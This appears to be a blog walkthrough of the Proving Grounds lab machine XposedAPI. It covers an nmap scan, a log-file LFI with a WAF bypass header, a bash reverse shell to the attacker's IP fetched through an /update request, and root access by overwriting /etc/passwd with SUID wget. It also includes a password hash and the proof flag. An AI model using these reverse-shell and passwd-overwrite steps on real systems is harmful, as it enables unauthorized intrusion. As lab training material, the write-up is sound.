Logo
Overview

PG: XposedAPI | Walkthrough

November 28, 2021
1 min read
PG/Machines Boot2Root OSCP/Prep writeups CVE/WebCalendar mempodipper

Enumeration

Start with a Nmap scan

Terminal window
$ nmap $ip -p22,13337 -sVC


PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
13337/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Remote Software Management API
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.65 seconds

Exploitation

  • LFI on /logs?file=/etc/passwd : Bypass WAF with X-Forwarded-For: 127.0.0.1 Header
  • /upload
## shell.elf
┌──(imtodess㉿deathnote)-[~/ctf/pg/xposedapi/exploit]
└─$ cat shell.elf
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.145/80 0>&1


POST /update HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 67


{"user":"clumsyadmin", "url":"http://192.168.49.145/shell.elf"}
  • /restart to get the shell
Terminal window
POST /restart HTTP/1.1
Host: 192.168.145.134:13337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Privilege Escalation

SUID | Wget

Terminal window
clumsyadmin@xposedapi:~$ find / -type f -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/wget
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd

Replace the /etc/passwd

Terminal window
clumsyadmin@xposedapi:~$ cat /etc/passwd
<snip>
newroot:BKLzEP1rEQre2:0:0::/root:/bin/bash


clumsyadmin@xposedapi:~$ su newroot
Password:
root@xposedapi:/home/clumsyadmin# cd /root
root@xposedapi:~# ls
proof.txt
root@xposedapi:~# cat proof.txt
589015e8b797f2d3bff1f16cc11b58c9


clumsyadmin@xposedapi:~$ wget http://192.168.49.145/passwd -O /etc/passwd